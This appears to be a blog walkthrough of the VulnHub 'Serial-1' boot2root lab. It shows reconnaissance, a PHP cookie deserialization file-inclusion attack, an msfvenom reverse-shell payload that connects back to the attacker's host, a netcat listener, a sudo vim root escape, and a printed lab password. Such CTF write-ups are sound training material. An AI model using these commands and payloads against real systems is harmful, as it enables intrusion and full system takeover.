1# Introduction:
- Serial-1 is a boot2root machine from VulnHub and its size is 3.5GB and you can find it HERE.
- Operating System: Ubuntu 19.04.
- Author: sk4.
- Date-Release: 20 Aug 2019.
- I used VirtualBox to run this machine.
- Level: Beginner – Intermediate.
- Purpose: Get the root permissions & get the user and root flags.
2# Information Gathering:
After running the machine on VirtualBox the lock screen was
then i opened Nmap to do ping scan to know the IP of this machine so i opened my terminal and i typed this command nmap -sn 192.168.1.0/24 and the results told me that the IP of sk4 machine is 192.168.1.10 and my IP was 192.168.1.3
now we will do some Active information gathering, we will do port scanning by nmap tool to discover the open ports and services run on these ports.
i typed nmap -sV -sC -p0-65535 192.168.1.10 and the result was
So, we have two ports open
The first is 22/tcp and the services running on this port is ssh and its version is openssh 7.9p1.
The second is 80/tcp and the service running on this port is http and its version is apache httpd 2.4.38.
and the other ports are closed.
Now i’ll open my browser and i’ll go to 192.168.1.10 to see the web site and the web site was as follow:
Now we have enough information to start the next phase ‘Vulnerability Scanning’.
3# Scanning:
The second phase is Vulnerability Scanning and we will scan the website to find bugs or anything that can lead us to hack this machine.
So, i’ll try to find some directories by brute-forcing and i’ll use gobuster tool and the dirb wordlist called common.txt by typing
gobuster dir -u 192.168.1.10 -w /usr/share/dirb/wordlist/common.txt -v | grep “Found”
and the result was as follow:
the directory /backup looks like interesting so i visited 192.168.1.10/backup and i found a file called bak.zip so i downloaded it
and i found 3 php files in this file
The content of the first file:
The content of the second file:
The content of the third file:
Now we have three interesting files so we should analyse them to know its purpose and try to get much information as we can.
After analysing of these files i knew that these files to test a new cookie handler and it can generate a new specific cookie with data of our choice.
I edited the first file and i added
echo base64_encode(serialize(new User(‘root’)));
then i run the file by typing php index.php and the result was as follow:
It generates a new cookie with user called root and if we intercepted the request and replaced the old cookie with the generated one we will see that the change in the page.
but the important thing is in the log.class.php file, after analysing this file it should show the logs data but the variable is empty so, what about adding a file!
we will test this now by editing the log.class.php file as follow
and we should edit the user.class.php file as follow
now we will type php index.php to generate the new cookie and replace it with the old one to see if anything changes.
I used burb to intercept the request and replace the cookie and the result was
Bingo! it shows the content of the /etc/passwd file so this system has a file inclusion bug and we can include files and open it on the system so, what about making a reverse shell and include it!
4# Exploitation:
Now we will exploit the file inclusion bug to include a php reverse shell to establish a connection between us and the machine.
I opened Metasploit framework and i searched for php to get all payloads and exploits related to php in metasploit framework so, i opened msf5 and typed search ‘php’
and i found a payload called
and i opened it in msf5 and i showed its information
so this payload requires the local host & local port
I used msfvenom to generate the payload by typing
msfvenom -p php/reverse_php LHOST=192.168.1.3 LPORT=1998 > pay.php
Now we wanna make a simple server with python to make our payload reachable by the machine
the command python -m SimpleHTTPServer 80 will make a simple server.
and the server sounds working good.
now we should edit the log.class.php file to edit the path of the log file and replace it with the path of our payload.
then i generated the new cookie by typing php index.php and the result was.
then i used netcat tool to listening on port 1998 that i typed in payload and the command is
nc -lv -p 1998 and now we are listening on port 1998.
then i opened burb and i intercepted the request to replace the old cookie with the generated one.
now the connection is established and the result in netcat terminal is.
I searched for useful file to make me able to gain access through ssh and i found the credentials of the sk4 user and it was
[sk4:KywZmnPWW6tTbW5w]
so, i sshed the machine with this credentials by typing ssh sk4@192.168.1.10 and it was right and i found the first flag!
5# privilege Escalation:
After gaining access on the machine we try to escalate our permissions to get the root permissions so, i typed sudo -l to see what process i can run with sudo and i found that we can run vim as a root without any passwords required.
I opened Google and searched for exploits that can me root by vim and the result is to open vim by sudo vim then write :!/bin/bash
and bingo! we are the root now! and the flag is
now the machine is PWNED successfully and the shadow file is
Thank you for your reading and i hope you learned something new.
You can find me on:
MagMadiat 
Leave a comment